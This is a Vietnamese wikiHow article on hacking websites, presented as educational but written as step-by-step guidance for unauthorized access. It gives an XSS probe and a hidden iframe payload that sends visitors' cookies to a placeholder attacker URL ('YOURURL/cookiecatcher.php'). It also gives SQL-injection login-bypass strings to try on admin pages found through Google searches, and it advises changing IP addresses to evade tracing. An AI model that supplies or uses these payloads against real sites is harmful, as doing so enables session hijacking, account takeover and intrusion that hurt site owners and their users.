Tải về bản PDF
Tải về bản PDF
X
wikiHow là một trang "wiki", nghĩa là nhiều bài viết ở đây là nội dung của nhiều tác giả cùng viết nên. Để tạo ra bài viết này, 98 người, trong đó có một số người ẩn danh, đã thực hiện chỉnh sửa và cải thiện bài viết theo thời gian.
Bài viết này đã được xem 21.505 lần.
Làm thế nào để hack website? Dù hack mọi trang là không thể nhưng bạn hoàn toàn có thể truy cập trái phép vào những trang dễ tấn công, chẳng hạn như một diễn đàn. Trong bài viết này, wikiHow sẽ hướng dẫn bạn cách hack website thông qua khai thác lỗ hổng cross site scripting (XSS), các kỹ thuật tấn công bằng mã độc hại cũng như đưa ra một số lời khuyên để bạn có được sự chuẩn bị cần thiết cho thành công trong lĩnh vực này. Lưu ý: Bài viết này được viết hoàn toàn với mục đích giáo dục – nhằm giúp người đọc bắt đầu học về cách hack hợp pháp cũng như nhận biết cách thức làm việc của hacker để tự bảo vệ tốt hơn.
Các bước
Phương pháp 1
Phương pháp 1 của 3:Sử dụng XSS
Phương pháp 1
-
1Tìm một trang dễ tấn công cho phép bạn đăng tải nội dung, chẳng hạn như một diễn đàn nào đó. Lưu ý rằng phương pháp này không hiệu quả với những trang an toàn.
-
2Vào và đăng tải nội dung. Bạn sẽ phải nhập một số code (mã lập trình) đặc biệt vào phần “post” (Đăng) để thu thập toàn bộ dữ liệu của những người nhấp chuột vào nó.
- Bạn nên kiểm tra xem liệu code này có bị lọc bởi hệ thống hay không. Hãy đăng
<script>window.alert(“test”)</script>
Nếu hộp cảnh báo xuất hiện khi bạn nhấp chuột vào bài đăng thì nghĩa là website đó không an toàn.
- Bạn nên kiểm tra xem liệu code này có bị lọc bởi hệ thống hay không. Hãy đăng
-
3Tạo và tải chương trình đánh chặn cookie của bạn. Mục đích của cuộc tấn công này là chiếm được cookie của người sử dụng, từ đó truy cập vào tài khoản trên các website có quy trình đăng nhập không an toàn. Lúc này, bạn cần chương trình đánh chặn cookie nhằm chiếm và chuyển hướng cookie của đối tượng mục tiêu. Hãy tải chương trình này lên website hỗ trợ php mà bạn có thể truy cập vào và tham khảo thêm về code của các chương trình đánh chặn.
-
4Đăng chương trình đánh chặn cookie của bạn. Nhập mã phù hợp vào bài đăng được dùng để chiếm cookie và gửi chúng về trang của bạn. Bạn nên nhập một số văn bản sau đoạn code để bài đăng bớt đáng ngờ và không bị xóa.
- Chẳng hạn như bạn có thể dùng
<iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookiecatcher.php?c=' document.cookie)></iframe>
- Chẳng hạn như bạn có thể dùng
-
5Sử dụng cookie thu thập được. Lúc này, bạn có thể sử dụng tùy ý thông tin cookie được lưu vào website của bạn.Quảng cáo
Phương pháp 2
Phương pháp 2 của 3:Tấn công bằng cách chèn mã độc
Phương pháp 2
-
1Tìm trang dễ tấn công. Bạn nên tìm những trang có lỗ hổng trong quy trình đăng nhập quản trị. Hãy thử tìm từ khóa admin login.asp trên Google.
-
2Đăng nhập với quyền quản trị. Dùng admin cho tên đăng nhập và thử một vài chuỗi ký tự khác nhau cho phần mật khẩu. Đó có thể là bất kỳ chuỗi nào, thường gặp có thể kể đến 1’, ’1’='1 hoặc 2'='2.
-
3Hãy kiên nhẫn. Nhiều khả năng bạn sẽ phải thử nhiều lần.
-
4Truy cập website. Với những trang dễ tấn công, rồi bạn cũng sẽ tìm được chuỗi ký tự cho phép bạn truy cập bằng quyền quản trị.Quảng cáo
Phương pháp 3
Phương pháp 3 của 3:Tạo tiền đề để thành công
Phương pháp 3
-
1Học một vài ngôn ngữ lập trình. Để hack một cách thực thụ, bạn cần hiểu cách thức hoạt động của máy tính và các công nghệ khác. Việc học cách sử dụng những ngôn ngữ lập trình như Python hay SQL sẽ giúp bạn có được kiểm soát tốt hơn với máy tính và nhận diện được điểm yếu bảo mật trong các hệ thống.
-
2Trang bị kiến thức HTML cơ bản. Bạn cũng cần hiểu sâu về html và javascript, đặc biệt là trong trường hợp bạn muốn hack các website. Dù việc học tiêu tốn thời gian nhưng có vô số cách để bạn có thể học miễn phí trên internet. Chỉ cần bạn muốn, cơ hội vẫn là của bạn.
-
3Tham khảo ý kiến “whitehat” - chuyên gia bảo mật máy tính. Họ là những hacker sử dụng khả năng của mình cho những mục tiêu tốt đẹp, khai thác lỗ hổng bảo mật và cải thiện môi trường internet cho tất cả mọi người. Nếu muốn học hack và sử dụng khả năng của mình một cách đúng đắn hay đơn giản là để bảo vệ website của mình thì bạn nên liên hệ và xin lời khuyên từ các chuyên gia này.
-
4Tìm hiểu về hack. Nếu muốn học cách hack hay tự bảo vệ mình, bạn sẽ phải nghiên cứu khá nhiều. Website có thể bị tấn công theo vô số cách khác nhau và danh sách này biến đổi mỗi ngày. Do đó, bạn sẽ phải không ngừng học hỏi.
-
5Cập nhật. Bởi kỹ thuật hack không ngừng thay đổi, bạn cần không ngừng cập nhật. Chỉ vì lúc này được bảo vệ trước một số loại hack nào đó không có nghĩa là trong tương lai, bạn vẫn an toàn!Quảng cáo
Lời khuyên
- Vào diễn đàn dành cho hacker để có được nhiều lời khuyên hữu ích.
- Chỉ dẫn này được viết hoàn toàn vì mục tiêu giáo dục, với mong muốn giúp mọi người bắt đầu học hack một cách đúng đắn cũng như nhận biết cách thức làm việc của hacker để có thể tự bảo vệ tốt hơn.
Cảnh báo
- Đọc xong bài này, bạn không thể trở thành hacker ngay. Bạn PHẢI trau dồi các kỹ năng và không ngừng luyện tập, luyện tập và luyện tập.
- Nếu định hack thật sự, bạn nên đổi địa chỉ IP bằng các phần mềm sẵn có trên mạng.
Về bài wikiHow này
Ngôn ngữ khác
English:Hack a Website
Español:hackear un sitio web
Italiano:Violare un Sito Web
Português:Hackear um Site
Русский:взломать веб–сайт
中文:入侵一个网站
Français:pirater un site Web
Bahasa Indonesia:Meretas Situs Web
Nederlands:Een website hacken
العربية:اختراق المواقع
ไทย:แฮกเว็บไซต์
हिन्दी:किसी वेबसाइट को हैक करें
한국어:웹사이트 해킹하는 방법
Trang này đã được đọc 21.505 lần.
Bài viết này đã giúp ích cho bạn?
Quảng cáo
